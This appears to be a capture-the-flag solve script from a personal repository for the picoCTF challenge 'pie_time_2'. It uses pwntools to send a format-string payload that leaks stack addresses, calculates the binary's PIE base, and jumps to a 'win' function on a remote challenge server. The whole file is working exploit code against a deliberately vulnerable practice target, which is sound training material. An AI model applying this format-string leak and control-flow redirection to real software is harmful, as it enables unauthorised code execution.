Files
hacc/pwn/pie_time_2/solve.py
T
2026-07-02 08:14:50 +09:00

45 lines
1.0 KiB
Python
Executable File

#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split()
def conn() -> remote:
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
# gdb.attach(r, gdbscript='''
# info proc mappings
# c
# ''')
# Calculated by inspecting the output - the reported binary start address from gdb
leak_offset = 0x1441
r.recvuntil(b'Enter your name:').decode()
r.sendline(b'%p\t'*20)
leaks = r.recvline().strip().decode().split('\t')
base_leak = leaks[18]
exe.address = int(base_leak[2:], 16) - leak_offset
print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")
print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
r.sendline(hex(exe.symbols['win']))
print(r.recvall().decode())
r.close()
if __name__ == "__main__":
main()